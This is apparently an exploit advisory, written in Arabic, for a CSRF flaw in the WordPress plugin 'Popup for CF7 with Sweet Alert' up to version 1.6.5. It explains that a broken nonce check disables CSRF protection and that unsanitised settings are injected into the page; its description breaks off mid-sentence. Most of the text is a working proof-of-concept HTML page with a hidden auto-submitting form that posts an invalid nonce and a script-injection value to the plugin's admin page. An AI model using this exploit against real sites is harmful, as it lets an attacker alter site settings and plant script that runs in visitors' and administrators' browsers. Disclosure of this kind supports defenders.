
Popup for CF7 with Sweet Alert <= 1.6.5 - تزوير الطلب من جانب الموقع
Popup for CF7 with Sweet Alert <= 1.6.5 - تزوير الطلب عبر المواقع
https://wordpress.org/plugins/cf7-sweet-alert-popup/
يحتوي معالج الإعدادات في الإضافة على خطأ منطقي في التحقق من nonce يؤدي إلى تعطيل جميع حمايات CSRF. يمكن لمهاجم غير مُصادَق عليه استغلال ذلك عبر خداع مدير مُصادَق عليه لزيارة صفحة خبيثة تحتوي على نموذج مخفي يُرسل نفسه تلقائيًا، مما يتيح تعديل إعدادات الإضافة بشكل عشوائي. تُخزَّن القيم المُرسَلة دون تنقية وتُحقَن حرفيًا داخل وسم
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>
<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
method="POST" id="csrf" target="hiddenframe">
<input name="cf7simplePopupWidth" value="500;alert(document.domain)">
<input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>